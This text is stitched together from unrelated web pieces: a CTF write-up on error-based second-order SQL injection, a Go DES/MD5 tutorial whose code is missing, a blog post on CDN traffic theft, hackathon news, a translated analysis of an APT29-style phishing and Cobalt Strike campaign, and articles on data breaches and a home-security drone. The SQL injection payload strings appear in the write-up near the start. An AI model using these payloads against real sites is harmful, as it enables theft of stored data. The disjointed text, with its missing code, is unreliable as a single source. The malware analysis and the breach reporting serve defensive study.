不知道是不是非预期了？题目提示RCE，还有一个backdoor的路由没用上

发现题目提示2次注入

于是尝试注册

sky' sky'#

发现前者分数都是0，后者有分数

那么可以判断，更新分数的时候使用了用户名

但是想要构造一般的bool盲注不行，因为必须sql语句报错

这里想到整数溢出问题

1' and if(1,exp(999999999999),1)#

这样即可使sql语句报错，导致出现

grade 0

而如果使用

1' and if(0,exp(999999999999),1)#

那么分数一切正常，于是可以利用这一点进行注入

编写脚本

不知道题目提示文件包含是什么意思，可能非预期了?

des是对称加密算法，更多关于des算法以及des算法实现移步百度。

说明，内容转载至： http://blog.studygolang.com/2013/01/go%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%E4%B9%8Bdes/

Go DES加密解密

1、crypto/des包

Go 中 crypto/des 包实现了 Data Encryption Standard (DES) and the Triple Data Encryption Algorithm(TDEA，三重DES加密）。查看该包文档。

定义了DES块大小（8bytes），定义了一个KeySizeError。另外定义了两个我们需要特别关注的函数，即

两个函数都是用来获得一个cipher.Block。从名字中可以很容易知道，DES使用NewCipher，3DES使用NewTripleDESCipher。参数都是密钥（key）

DES加密解密（CBC模式）

1）加密

代码实现：

以上代码使用DES加密（des.NewCipher），加密模式为CBC（cipher.NewCBCEncrypter(block, key))，填充方式PKCS5Padding，该函数的代码如下：

可见，数据长度刚好是blockSize的整数倍时，也进行了填充。

2、解密

可见，解密无非是调用cipher.NewCBCDecrypter，最后unpadding，其他跟加密几乎一样。相应的PKCS5UnPadding：

3DES加密解密

1）加密代码

对比DES，发现只是换了NewTripleDESCipher。不过，需要注意的是，密钥长度必须24byte，否则直接返回错误。关于这一点，php中却不是这样的，只要是8byte以上就行；而Java中，要求必须是24byte以上，内部会取前24byte（相当于就是24byte）。

另外，初始化向量长度是8byte（目前各个语言都是如此，不是8byte会有问题）。然而，如果你用的Go是1.0.3（或以下），iv可以不等于8byte。其实，在cipher.NewCBCEncrypter方法中有注释：

The length of iv must be the same as the Block’s block size.

可是代码中的实现却没有做判断。不过，go tips中修正了这个问题，如果iv不等于block size（des为8），则直接panic。所以，对于加解密，一定要测试，保证iv等于block size，否则可能会panic：

此处之所有用panic而不是返回error，个人猜测，是由于目前发布的版本，该方法没有返回error，修改方法签名会导致兼容性问题，因此用panic了。

解密代码：

md5包实现了MD5哈希算法

先介绍这个包内里的内容，然后再给出生成一个md5值，go使用md5比较复杂很多，php的话，就直接md5(值），就生成md5值了，php更加适合用于生产，而不是学习。

常量

返回数据data的MD5校验和

func New() hash.Hash

返回一个新的使用MD5校验的hash.Hash接口

我的CDN部署在腾讯云，10月2日接收到短信提醒：CDN流量已用完。登陆控制台后发现，被盗刷了360G，宽带峰值也到达了难以想象的680Mbps。 这对于一个个人网站来说，几乎是不可能的流量。

抱着怀疑的态度，我查看了区域商分布，果然，海外的请求占了总请求的98.24%。其中300多G的流量都来自海外，现在可以确定是歪果仁盗刷了我的CDN流量。

没有办法，被迫联系工单，但因为我自己的一些防御没做好，所以这次的补偿不了了之。无奈，只能出钱补上了被盗刷的流量，以保证服务正常使用。并且在工单的交流中，增设了QPS等安全措施。

毫无疑问，限制QPS会影响用户的正常使用，造成延迟。但保险起见，我还是设置了QPS，只希望不要再被攻击。

但好景不长，仅安稳度过了一天，又一波来自海外的DDoS让我不得不临时关闭CDN和COS服务。下图中第一个峰值是上一次DDoS，第二个峰值是这次的DDoS。

这次的攻击更高级，颇有一种“道高一尺，魔高一丈”的味道。因为之前应增设了QPS等限制，但这样完全限制不了IP代理池等攻击手段，黑客这次也选择了体积较大的单文件进行攻击。

我惯例去找了工单， 因为上次腾讯云的工程师专门call过来：只要增设了相关安全限制，下次确认是盗刷立即给予补偿 。然而这次工单依然是打太极，各种文档、规则扔给我，闭口不谈补偿问题，并且说是我的QPS设置太高了:)。

问题是：QPS设置成5，项目还用不用了？如果用户处于同一个局域网下（校内网、Wifi等场景），那在同一秒中只有一个用户可以正常使用？

最后，工程师还是call过来，经过了1小时的聊天，可以补偿，但是要等一段时间才能批下来这90G的流量包。然而我的流量已经超了，我还是要自己补以保证第二天正常使用。好吧，也算是一个解决方案。

经历了2次DDoS，我设置了“宽带封顶配置“。根据平日的使用量，我估计“3Mbps”，并且在超值的时候，返回404，关停服务。

当日晚，就接收到了CDN到达宽带封顶的短信，自动关停了CDN服务：项目也无法正常使用了。

这次，彻底是绝望了，只能先关闭CDN服务，寻求别的解决方法。

在补救的时候，首先排除了工单的意见：回源到原站或者COS（对象存储服务）。前者会直接造成服务器瘫痪，DDoS是结结实实打在服务器上；后者COS也是流量或者宽带后收费，本质上和CDN没区别。

所以，关闭当前的CDN加速域名，并且清空了COS中的文件。然后针对个人网站和项目应用做了不同的处理。

观察被盗刷的资源，全部都是个人网站的静态资源。而公司项目只有合作的商户在使用，并且在 robots.txt 中禁止了爬虫，所以用利用另一个账号开启了一个新的COS并且开启了对应的CDN加速域名。

至于为什么个人网站和公司项目要放在一起，只是因为方便上传和管理，现在看来省事一步，后患无穷。

借助免费的Git平台，可以存放图片、代码等数据，并且可以在外部访问到。考虑到国内用户居多，所以我将友链界面的图片和文章中的图片存放到了 Coding.net 的公有仓库中。

例如下面这种图片的地址就是： https://qcloud.coding.net/u/godbmw/p/blog/git/raw/master/markdown-static/网站搭建与运营/第一次遭遇云服务器完全崩溃/1.png

当当我把代码放在Coding或者github上时，虽然可以请求到代码的内容， 但是 Response Header 中的 Content-Type 字段的值是: text/plain; ... 。对于CSS样式文件，浏览器无法自动解析 。因此，打包后的js、css等项目文件不能放在Git平台。

这是全球最大的 免费的CDN ，并且 国内也可以访问 。ping值稳定在100ms左右，具体可以去查看相关测试文章。除此之外，cloudflare可以 抗下DDoS、CC等攻击 ，听说百度抗不下来海外的DDoS的时候，也是DNS解析到cloudflare进行处理。

cloudflare的操作很简单，首次注册按照它的指导到域名注册上修改DNS解析即可。如果是国外的域名注册商，几分钟就可以同步。国内的并没有尝试。如果成功了，CONSOLE页面就会显示“Active”。

除此之外，还有一下措施：

到此，个人网站就可以正常访问了。

在这之前一直在使用腾讯云，希望云平台可以采纳预付费（现在是后付费）限制宽带的做法。

而腾讯云的官方文档也有提及DDos等攻击造成流量激增的免除措施，如下图所示：

不知道大家发现了没有，宽带必须到达10Gbps以上才可以免除。然而这次经历的才只有680Mbps，如果到10Gbps，那后果真是不敢想象，怕是要赔掉裤子。 和工单讨论的时候，工单就给了我这张图片，如果用户被盗刷达到了9Gbps呢？也是他们说的不符合要求，还是需要用户自己买单 。损失肯定难以衡量。希望日后平台可以改进相关规定。

刚做网站的时候关心名头（傻傻觉得越大公司越靠谱），现在才发现云平台的 安全稳定、补救措施、收费标准 才是关键。

最后，如果是个人项目，强烈推荐使用国外的“cloudflare”，免费、不限流量、抗攻击，就像国外的JetBrians（教育版免费），都是有情怀的公司，致敬！！！

可能是最靠谱不忽悠的 区块链 资讯平台

导

导读

过去30年间，开源开发者一直是科技行业的支柱，NouGit将给这些开源项目本身带来财富，而不是让财富都流到微软或者IBM。

经常参加 EOS 会议的团队在旧金山的比赛中获得金奖，他们的 应用 符合项目经济和做出贡献的开发者的利益。

在软件开发领域，开源的概念是一个颇有魅力的概念。所谓的开源，就是允许任何一个IT开发人员构建和改进代码，从而造福所有的人。

这个理念是当代几大操作协议的基石，前有linux，后有EOSIO。

但如果IT开发者为改进协议提出解法能够被给予奖励，这事怎么样呢？

这就是NouGit背后的团队提出的诱人的理念，NouGit是这个月初在旧金山举行的EOS全球黑客马拉松的冠军项目。

这次比赛的主题是创建一个EOSIO应用，使它能“协调各方所获利益和/或给用户带来更多财富”，NouGit在激烈的竞争中击败了其它74支队伍，获得了高达10万美元的冠军奖励。它们的项目是一个去中心化和有激励机制的Git存储库，即跟踪和协调文件和软件中源代码变化的系统。

“过去30年间，开源开发者一直是科技行业的支柱，NouGit将给这些开源项目本身带来财富，而不是让财富都流到微软或者IBM，”Rob Behnke说，是一个连续创业者，也是五大NouGit队伍的其中一员，他们将在下个月到 南非 的开普敦参加黑客马拉松的决赛。

比方说，最近几个月微软和IBM都达成了数十亿美元的收购案，购买了世界两大开源开发平台。其中，微软以75亿美元的价格收购了GitHub，而IBM以340亿的价格购买了RedHat。

然而，Behnke认为这些“中心化”模型不能使合作最大化。“去中心化才能让平台发展和推动开源的概念，”他这么说，他还认为NouGit的赏金计划符合项目经理和参与的开发者的利益。

Behnke还说：“这就可以大幅度减少雇佣摩擦，因为项目经理可以在付钱给开发者之前先看看这个开发者能干什么。在现存的模型下，很多开源项目吸引不了任何人参与建设项目。通过提出清晰的赏金，项目完成的可能就上升了。”

同时，在区块链上记录所有的代码上传和交易细节就产生了一个“去信任化”的环境，这就让所有的项目经理都得诚实起来。

Behnke和他的同伴―Colby Gilbert，Fred Madrid，Mike Lin 和 来自摩尔多瓦的NicoLae Carabut―结合了软件工程、加密学、 金融科技 和UI/UX设计的专业知识。他们对改进开源模型的关注既反应了他们通过EOSIO和旧金山更大的区块链社区形成了有机体，也反映了他们有志于挖掘区块链在社会和经济变革上面的潜能。最终的结果是一个从开发者的角度出发、为开发者考虑的项目。

“我们分布在美国各地，但是我们经常会在旧金山的区块链合作空间Starfish Mission里面见面，”Behnke说。“我们经常在EOS会议中见面，黑客马拉松前一个月，我们特地安排了几次会议准备组队参赛。”

他们报名参加这场马拉松的原因是“多找些乐子”。最后，“结果却大大出乎意料“。

那么，在他们筹备NouGit产品的过程中，有什么收获呢？“和正确的人组队，然后相信彼此，这就是我们获得的最大的收获，” Behnke说，他还说EOSIO是业内最“有感染力”的平台。

“我们获得了极大的支持和极有建设性的反馈，这让我们一直在正确的轨道上，”他说，“同时，黑客马拉松上的导师们更是锦上添花，他们帮助我们取得突破、走到了最后。”

来源：http://eos.wiki

路透社最近报道有黑客组织对全球的多个目标发起了网络攻击活动。微软研究人员也追踪到了同样的攻击活动，本文介绍该攻击活动的相关细节。

研究人员发现攻击活动主要攻击公共机构和非政府组织，比如智库、研究中心和教育机构，以及石油、天然气、化工以及医疗行业的私营企业。

第三方安全研究人员分析称该攻击是APT 29（CozyBear）组织发起的攻击活动，微软称APT 29为YTTRIUM。截止目前，微软研究人员称还没有足够的证据表明该攻击活动来源于APT 29。

攻击活动是2018年11月14日早晨开始的。攻击目标主要是参与政策制定或在该区域有政治影响的机构。

钓鱼攻击在不同行业的分布

虽然目标分布在全球的不同行业，但主要分布在美国、尤其是华盛顿周边，其次是欧洲、香港、印度和加拿大。

钓鱼攻击活动地理分布

鱼叉式钓鱼邮件模仿通过OneDrive分享的通知，伪装成美国国务院的工作人员。如果接收者点击了鱼叉式钓鱼攻击邮件中的链接，就开始了攻击的漏洞利用链，最终会导致植入DLL后门，使攻击者可以远程访问接收者的机器。

攻击链

攻击中使用的鱼叉式钓鱼攻击邮件模仿通过OneDrive分享的嗯我那件共享通知。

邮件中含有一个合法但是被黑的第三方链接：

攻击者使用了随机字符串来识别点击了链接的不同目标。但所有该链接的变种都会将用户重定向到相同的链接：

hxxps://www.jmj.com/personal/nauerthn_state_gov/VFVKRTdRSm

当用户点击链接后，就会被提供一个含有恶意LNK文件的ZIP文件。攻击中所有文件的文件名都是相同的，比如ds7002.pdf, ds7002.zip, ds7002.lnk。

LNK文件表示攻击的第一阶段。它会执行一个混淆的powershell命令，该命令会从LNK文件的offset 0x5e2be扩展16632字节的位置提取出base64编码的payload。

LNK文件中编码的内容

编码的payload是一个严重混淆的PowerShell脚本，会被解码和执行：

第二个脚本会从.LNK文件中提取出两个额外的文件：

ds7002.PDF (诱饵PDF文件)

cyzfc.dat (1阶段植入)

PowerShell脚本会在路径%AppData%\Local\cyzfc.dat下创建一个第一阶段DLL文件cyzfc.dat。这是导出函数PointFunctionCall的64位DLL。

1. 为第二阶段payload分配ReadWrite页；

2. 提取第二阶段payload作为资源

3. 将header融入到第一阶段payload的0xEF字节

4. 将header加到资源从字节0x12A开始的位置中；

5. 用滚动XOR(ROR1)方法从key 0xC5开始解密第二阶段payload。

第二阶段payload是Cobalt Strike的一个实例，Cobalt Strike是一个商业渗透测试工具，会执行以下步骤：

1. 以\\.\pipe\MSSE-<number>-server格式定义一个本地命名的pipe，其中<number>是0到9897之间的随机数字；

2. 连接到pipe，写入全局数据size 0x3FE00；

3. 通过命名的pipe实现后门：

从pipe（最大0x3FE00字节）到分配的缓存中读取内容；

XOR解码payload到新的RW内存区域，这次使用的XOR key为：用0x7CC2885F每4个字节进行简单XOR

将该区域变成RX；

创建一个线程运行payload。

将全局数据写入pipe实际上是写的是一个第三方payload。Payload也是用相同的XOR算法加密的，解密后，与Meterpreter header组成了一个PE文件，可以翻译PE header中的指令，并将控制转移到反射加载器上：

第三个payload最后会加载并连接到C2服务器地址，其中C2服务器地址是融入到PE文件的配置信息中的。配置信息在第3个payload运行时会XOR解密：

配置信息本身含有C2信息：

CobaltStrike是一个功能丰富的渗透测试工具，提供给远程攻击者广泛的功能，包括提权、获取用户输入、通过PowerShell或WMI执行任意命令、执行侦察、通过不同协议与C2服务器通信、下载和安装恶意软件等。

ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1

ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609

ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873

cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf

C&C servers

Another week, another massive new corporate security breach that exposes your personal data. Names,email addresses, passwords, Social Security numbers, dates of birth, credit card numbers, banking data, passport numbers, phone numbers, home addresses, driver’s license numbers, medical records―they all get swept up by shadowy, amorphous hackers for fraud, identity theft, and worse. Sometimes the affected company will send you an email suggesting that you change a password or credit card number, but for the most part, these incidents are invisible―until they aren’t.

Think of data breaches as coming in two flavors: breaches of institutions that people choose to entrust with their data―like retailers and banks―and breaches of entities that acquired user data secondarily―like credit bureaus and marketing firms. Unfortunately, you can’t keep your information perfectly safe: It is often impossible to avoid sharing data, especially with organizations like governments and health insurers. Furthermore, in cases where a company or institution gives your information to an additional party, you’ve often agreed to sharing more data than you realize by clicking "I accept" on a dense user agreement.

Many of these incidents don’t necessarily even involve hackers. Data “exposures” occur when information that should have been locked down was accessible, but it’s unclear if anyone actually stole it.

Even after a data breach has occurred, though, and an unauthorized actor definitely has your data, you won’t necessarily see an immediate negative impact. Hackers who steal a trove of login credentials, for example, may quietly use them for under-the-radar crime sprees instead of selling or publishing the data. As a result, the repercussions of a breach can be very delayed, sometimes not fully manifesting for years.

Attackers tend to capitalize on certain types of data right away, namely financial information like credit card numbers. But some troves of data disappear into the ether, becoming a sort of ticking time bomb. Yet victims of identity theft know the consequences of data breaches intimately and painfully. They may have their credit wrecked by thieves, lose all their money, or be dogged for years by a shadow hand meddling in their affairs and opening digital accounts in their name.

The problem is so abstract and far-reaching that you would be forgiven for feeling that it’s not worth grappling with at all. Unfortunately for victims, there is no such thing as perfect security, and no way to eliminate absolutely all data breaches. But massive institutional breaches don’t need to happen as often as they do. Many occur not because of complex and sophisticated hacking but because organizations have made basic and potentially avoidable mistakes in implementing their security schemes. They’re low-hanging fruit for hackers to pluck.

Yes, it’s a difficult, never-ending process for a large organization to secure its inevitably sprawling networks, but for decades many institutions just haven’t really tried. They’ve gone through some of the motions without actually making digital security a spending priority. Over thepast 10 years, however, as corporate and government data breaches have ramped up―impacting the data of billions of people―institutional leaders and the general public alike have finally begun to understand the urgency and necessity of putting security first. This increased focus is beginning to translate into some concrete data protections and security improvements. But collective inaction for decades has created a security deficit that will take significant time and money to make up. And the reality that robust digital security requires never-ending investment is difficult for institutions to accept.

Data breaches have been increasingly common and harmful for decades. A few stand out, though, as instructive examples of how breaches have evolved, how attackers are able to orchestrate these attacks, what can be stolen, and what happens to data once a breach has occurred.

Digital data breaches started long before widespread use of the internet, yet they were similar in many respects to the leaks we see today. One early landmark incident occurred in 1984, when the credit reporting agency TRW Information Systems (now Experian) realized that one of its database files had been breached. The trove was protected by a numeric passcode that someone lifted from an administrative note at a Sears store and posted on an “electronic bulletin board”―a sort of rudimentary Google Doc that people could access and alter using their landline phone connection. From there, anyone who knew how to view the bulletin board could have used the password to access the data stored in the TRW file: personal data and credit histories of 90 million Americans. The password was exposed for a month. At the time, TRW said that it changed the database password as soon as it found out about the situation. Though the incident is dwarfed by last year’s breach of the credit reporting agency Equifax (discussed below), the TRW lapse was a warning to data firms everywhere―one that many clearly didn’t heed.

Large-scale breaches like the TRW incident occurred sporadically as years went by and the internet expanded. By the early 2010s, as mobile devices and the Internet of Things greatly expanded interconnectivity, the problem of data breaches became especially urgent. Stealing username/password pairs or credit card numbers―even breaching a trove of data aggregated from already public sources―could give attackers the keys to someone’s entire online life. And certain breaches in particular helped fuel a growing dark web economy of stolen user data.

A data breach occurs any time an entity accesses information it wasn’t meant to. If someone inconspicuously looks over your shoulder at your smartphone and reads what you’re typing, that’s a data breach. If someone a block away uses binoculars to look through your window and see what you’re watching on TV, that’s a data breach as well. You may not think it matters if someone knows you like The Good Place , but if it isn’t your intent for people to see what you’re watching, it’s a violation of your expectations.

One of these incidents was a breach of LinkedIn in 2012 thatinitially seemed to expose 6.5 million passwords. The data was hashed, or cryptographically scrambled, as a protection to make it unintelligible and therefore difficult to reuse, but hackers quickly started “cracking” the hashes to expose LinkedIn users’ actual passwords. Though LinkedIn itself took precautions to reset impacted account passwords, attackers still got plenty of mileage out of them by finding other accounts around the web where users had reused the same password. That all too commonlax password hygiene means a single breach can haunt users for years.

Think of an exposure as putting that same window at street level. Anyone walking by could see what’s on your TV. Whether they actually do doesn’t matter―the risk is there. When sensitive data like medical records or banking information gets exposed, the stakes are high.

The LinkedIn hack also turned out to be even worse than it first appeared. In 2016 a hacker known as “Peace”started selling account information, particularly email addresses and passwords, from 117 million LinkedIn users. Data stolen from the LinkedIn breach has been repurposed and re-sold by criminals ever since, and attackers still have some success exploiting the data to this day, since so many people reuse the same passwords across numerous accounts for years.

A common reassurance after a data exposure is that there is no evidence the data was stolen. To a degree, it is possible to review access logs and other system indicators to determine this, but generally organizations have no way of knowing for certain what went on while they weren’t watching. This is what makes data exposures such a big problem, whether it’s through your window or via a database that a company left accessible online: It’s always possible that someone realized they could peek in and exfiltrated some information without anyone realizing.

Data breaches didn’t truly become dinner table fodder, though, until the end of 2013 and 2014, when major retailers Target, Neiman Marcus, and Home Depot suffered massive breaches one after the other. TheTarget hack, first publicly disclosed in December 2013, impacted the personal information (like names, addresses, phone numbers, and email addresses) of 70 million Americans and compromised 40 million credit card numbers. Just a few weeks later, in January 2014, Neiman Marcus admitted that its point-of-sale systems had been hit by the same malware that infected Target, exposing the information of about 110 million Neiman Marcus customers, along with 1.1 million credit and debit card numbers. Then, after months of fallout from those two breaches, Home Depot announced in September 2014 that hackers had stolen 56 million credit and debit card numbers from its systems byinstalling malware on the company’s payment terminals.

An even more devastating and sinister attack was taking place at the same time, though. The Office of Personnel Management is the administrative and HR department for US government employees. The department manages security clearances, conducts background checks, and keeps records on every past and present federal employee. If you want to know what’s going on inside the US government, this is the department to hack . So China did.

Hackers linked to the Chinese government infiltrated OPM’s network twice , first stealing the technical blueprints for the network in 2013, then initiating a second attack shortly thereafter in which they gained control of the administrative server that managed the authentication for all other server logins. In other words, by the time OPM fully realized what had happened and acted to remove the intruders in 2015, the hackers had been able to steal tens of millions of detailed records about every aspect of federal employees’ lives, including 21.5 million Social Security numbers and 5.6 million fingerprint records . In some cases, victims weren’t even federal employees, but were simply connected in some way to government workers who had undergone background checks. (Those checks include all sorts of extremely specific information, like maps of a subject’s family, friends, associates, and children.)

Pilfered OPM data never circulated online or showed up on the black market, likely because it was stolen for its intelligence value rather than its street value. Reports indicated that Chinese operatives may have used the information to supplement a database cataloging US citizens and government activity.

Today, data breaches are so common that the cybersecurity industry even has a phrase―“breach fatigue”―to describe the indifference that can come from such an overwhelming and seemingly hopeless string of events. And while tech companies, not to mention regulators, are starting to take data protection more seriously, the industry has yet to turn the corner. In fact, some of the most disheartening breaches yet have been disclosed in the last couple of years.

Yahoo lodged repeated contenders for the distinction of all-time biggest data breach when it made an extraordinary series of announcements beginning in September 2016. First, the company disclosed that anintrusion in 2014 compromised personal information from 500 million user accounts. Then, two months later, Yahoo added that it had suffered a separate breach inAugust 2013 that exposed a billion accounts. Sounds like a pretty unassailable lead in the race to the data-breach bottom, right? And yet! In October 2017, the company said that after further investigation it was revising its estimate of 1 billion accounts to 3 billion―or every Yahoo account that existed in August 2013.

There are few companies that even have billions of user accounts to lose, but there are still other ways for a breach to be worse than the Yahoo debacles. For example, the credit monitoring firm Equifax disclosed amassive breach at the beginning of September, which exposed personal information for 147.9 million people. The data included birth dates, addresses, some driver's license numbers, about 209,000 credit card numbers, and Social Security numbers―meaning that almost half the US population potentially had their crucial secret identifier exposed . Because the information stolen from Equifax was so sensitive, it's widely considered the worst corporate data breach ever. At least for now.

Equifax also completely mishandled its public disclosure and response in the aftermath. The site the company set up for victims was itself vulnerable to attack, and it asked for the last six digits of people's Social Security numbers to check if their data had been impacted by the breach. This meant that Equifax was asking Americans to trust them with their data all over again. Equifax also made the breach-response page a stand-alone site, rather than part of its main corporate domain―a decision that invited imposter sites and aggressive phishing attempts. The official Equifax Twitter account even mistakenly tweeted the same phishing link four times. Four. Luckily, in that case, it was just a proof-of-concept research page and not an actual malicious site.

There have since beennumerous indications that Equifax had a dangerously lax security culture and lack of response procedures in place. Former Equifax CEO Richard Smith told Congress in October 2017 that he usually only met with security and IT representatives once a quarter to review the company's security posture. And hackers got into Equifax's systems for the breach through a known web framework vulnerability for which a patch had been available for months. A digital platform used by Equifax employees in Argentina was even protected by the ultra-guessable credentials "admin, admin"―a truly rookie mistake.

If any good came from the Equifax breach, it was that the sheer severity may have served as the wake-up call corporate American needed. On the other hand, a year after that breach, the frequency of successful attacks doesn’t seem to have abated. And the eeriest thing about the Equifax breach? The data still hasn’t surfaced. Data aggregators like Equifax, who pull in an enormous amount of public and private information from myriad sources, have become a single point of failure of the digital age. More and more often, attackers target data analytics companies as a one-stop-shop for valuable information. But hackers still have their sights set on the true industry giants as well―if they can find a way in. Just weeks ago, Facebook disclosed its first-ever true data breach , in which attackers gained access to 30 million user authorization tokens. This meant that the hackers could access users’ Facebook accounts and exfiltrate a significant portion of their personal data. Facebook is investigating the incident with the FBI and has not yet said who was behind it or what their goals were in launching the attack.

And the security breach train rolls on. Within a few days of each other this month, Marriott and Quora both announced large breaches impacting more than 100 million users. InMarriott’s case, the intrusion occurred in the Starwoods Preferred Guest system and persisted for four years. Marriott acquired Starwoods in September 2016, two years after attackers would have first infiltrated, but it then persisted for two more years on Marriott’s watch. The breach exposed various combinations of personal details, including hundreds of millions of passport numbers, from as many as 500 million customers overall, making it one of the three largest known breaches to date.

Attackers are able to perpetrate most current data breaches relatively easily by exploiting an institution’s basic security oversights―that’s what happened with Home Depot, OPM, and Equifax. If businesses and other institutions learned from these organizations’ mistakes, there could be a real reduction in the number of data breaches that occur overall. But improvement doesn’t come from making breaches impossible. The best improvements come from accepting the possibility of breach and significantly raising the barrier to entry or the resources required to carry one off. This would deter many would-be attackers, because unskilled hackers (or those who are simply idly poking around) wouldn’t be able to find as many blatant vulnerabilities to easily exploit.

An important concept in security, though, is the idea of the cat and mouse game. For determined, motivated, and well-resourced attackers, improved defenses spur malicious innovation. This is why security is an endless expense that institutions try to minimize, cap, or avoid altogether―defenders need to think of everything, while attackers only need to find one small mistake. An unpatched web server or an employee clicking a malicious link in a phishing email can be all it takes.

That’s also why some of the most groundbreaking examples of next-generation hacking come from targeted attacks to surveil high-profile individuals and groups―often political candidates, dissidents, activists, or spies attempting to infiltrate each others’ organizations. Hackers working to carry out these types of high-priority attacks will develop or pay large sums of money for so-called zero-day exploits. These consist of two parts: information about an undisclosed vulnerability in a system, and software that is programmed to take advantage of that flaw to give some type of increased system access or control to whoever deploys the exploit. A software developer can’t defend a vulnerability they don’t know about, so zero-day exploits push the limits of what’s possible for attackers by giving them a secret path into a network or database.

Require users to set up strong, unique passwords and two-factor authentication to access network services.

Implement access controls so everyone can’t access everything. Users should only be able to see the content and applications they need.

Segment enterprise networks so that sensitive data and operations run in different digital areas and aren’t accessible from parts of the network that are low-sensitivity.

Apply software updates as soon as they’re available. For real.

More attackers may be forced to use zero-day exploits to carry out future breaches―increasing the resources required―if businesses, governments, and other institutions succeed in substantially improving their baseline cybersecurity postures through initiatives like consistent patching and network access control. But for now, enough easy targets remain that attackers don’t need to work very hard or spend a lot of money to perpetrate massive data breaches. Even just using publicly available internet scanning tools can reveal unprotected devices and databases where valuable information is tantalizing exposed.

Until that changes, US citizens and permanent residents would have more protection against fraud and identity theft if the US government would replaceSocial Security numbers. These strings of digits were never meant to act as universal identifiers, much less as secure authenticators, and it is impossible for people to keep a set of digits secret when they are also being asked to share the number repeatedly throughout their lives. Instead, the US government should offer (as other countries do) a purpose-built universal identity scheme that incorporates numerous, diverse authenticators. That way, even if hackers compromise one piece of information, people can still regain control of their identities.

Ideally, companies and other institutions that hold data would commit to invest forever in rigorously locking their systems down. But organizations always vacillate between factoring in cost, ease of use, and risk. There’s no easy way to reconcile the three. And even if there were, no security scheme is ever perfect. The best way to minimize the impact of a mega-breach, then, is not just to reduce the number of incidents, but to better manage the inevitable fallout.

Tucked away high in the residential hills of suburban San Carlos, California, is a three-bedroom home with its own autonomous aerial security system. The house is no different than any other residence on the quiet street full of well-manicured lawns and spacious views of the Pulgas Ridge Preserve.

But it just happens to be the personal home of former Evernote executive and Sunflower Labs CEO Alex Pachikov. He’s turned the house into a prototype home for the Sunflower system, which uses a series of motion and vibration sensors in conjunction with an autonomous drone to monitor all activity, down to measuring the footsteps on the grass outside his front door.

“We have a core belief that a lot of value is hidden not just in the vision spectrum, but the motion and vibration spectrum,” Pachikov tells me before using a Siri integration on his iPhone to launch the drone from his backyard with a voice command.

Part of the Sunflower system involves the Sunflowers, the small, roughly 1.5-meter bulbs filled with sensors that are disguised as garden lights. “The sensors can detect people, pets, and cars. Vibration sensors detect footsteps, car engines... even if you’re running a coffee maker.” The Sunflowers are placed around the home to help create a map and triangulate people and other objects within the space. But the real draw of the Sunflower system is the drone that flies itself. The drone is called the Bee, and its base station is called the Hive.

The whole system works together by letting the Bee leave its station and then fly around the home capturing video by using the Sunflowers to perform path planning and relying on its built-in cameras and sensors to avoid obstacles. When it’s ready to land, you press a button on the Sunflower mobile app, and the drone docks itself into the funnel-shaped landing zone of the base station, which also doubles as a conductive wireless charger.

In practice, the Sunflower system would alert a homeowner of something unexpected moving around the house, thanks to the ground sensors. They would then manually choose whether to deploy the drone, which would then stream a live 1080p video feed to your phone or tablet. Once the drone is docked again, the video is saved to the cloud. The company says it’s designing the system to be deployable by both homeowners and third-party monitoring services, like ADT, in the event that you’re asleep or away from home and not monitoring your phone when the activity occurs.

“The security industry is just absolutely ripe for disruption. They haven’t done anything particularly new in 30 years,” Pachikov says. “It’s door and window sensors, and CCTV cameras.” Instead of having to go back and see what went wrong after an intruder has already broken in, or needing to have someone monitor the system all of the time, Pachikov says he “wants to know what’s happening around my property before it’s at my door.” For instance, if someone is scoping out the house to see whether it could be a viable target at some later date.

Although the concept of operating your own personal drone surveillance system can seem outlandish and excessive, Pachikov sees it as a viable and new type of deterrent. “Current security systems don’t provide any deterrents. Mostly it’s a 120-decibel alarm that blows out your eardrums because it’s mostly false alarms,” he says. “If the drone comes out, it’s very similar to a security guard coming out, or at the very least, a dog barking.” The noise is a deterrence element, too; in my experience, it was about as loud as other consumer drones on the market. Pachikov says they plan on reducing the noise a bit, and that using 3D-printed parts for the prototype is one reason why it’s louder than the company eventually intends it to be.

In this way, Sunflower Labs represents a new kind of drone company. It’s one that specializes less in the physical hardware and camera capabilities of an unmanned aerial vehicle (UAV), like Chinese drone giant DJI, but in the possibilities a drone provides you as a consumer if it’s specifically outfitted to fulfill a certain need. Similar to Skydio, an AI-focused startup that makes a self-flying drone for action sports enthusiasts , Sunflower is taking advantage of the fast-maturing drone market to sell the promise of aerial video surveillance to both the home consumer and the security industry at large.

Sunflower Labs has been working on the project for nearly three years now with more than $6 million in funding . Investors include General Catalyst ― former Evernote CEO and co-founder Phil Libin, who now works as an adviser at GC, helped close the seed round ― and Stanley Black & Decker, the industrial tool maker that also happens to be a major supplier of commercial security systems. The company is split between 10 employees in Zurich, Switzerland, and another eight in San Francisco.

The goal with the Sunflower system right now is to sell it to consumers on a subscription, while pursuing commercial applications in the future. Pachikov estimates that the whole package will cost someone around a few hundred dollars a month, and it will include the Sunflower sensor lights, the Hive base station, and a Bee drone.

Pachikov has no delusions about the product or who it is designed for. Sunflower doesn’t want every home to be outfitted with a security drone. “We’re going for higher-end, affluent people who are tech-savvy and eager to do this,” Pachikov says. “Once we’re self-sustaining, we’re going to drive the cost down and go for more regular homes.”

The goal is to target low- to medium-density areas; in other words, suburban America. Pachikov says Sunflower already has thousands of customers lined up to purchase the system with its subscription model. Down the line, Pachikov says its ties with Stanley Black & Decker will open up new avenues into commercial drone security. The hope is that, unlike standard, wired security systems or even the AI-driven Knightscope security robots , a drone is a better and more efficient way to surveil a scene, cover large amounts of ground quickly, and avoid being tampered with by an intruder.

There is, of course, the matter of Federal Aviation Administration regulations , which make commercial drone operations a bit difficult without jumping through some serious regulatory hoops. There are also rules for consumer and hobbyist drone flights concerning flying outside an operator’s line of sight as well as at night. (The Sunflower drone is designed to capture video at night and operate autonomously in the dark, as well as other tricky weather conditions like rain and wind.)

“The regulations to allow things like this are imminent,” he says. Currently, in a homeowner setting, you can fly a drone on your own property as a hobbyist. Eventually, Pachikov wants the drone to be able to deploy itself without requiring the manual go-ahead from the mobile app. To get there, Sunflower will have to bring the weight of its drone down a bit, as Pachikov says a device under half a pound would bring the UAV into the least restrictive FAA category. “We’re at three pounds. Hopefully, we drive the weight down and they raise the limit.”

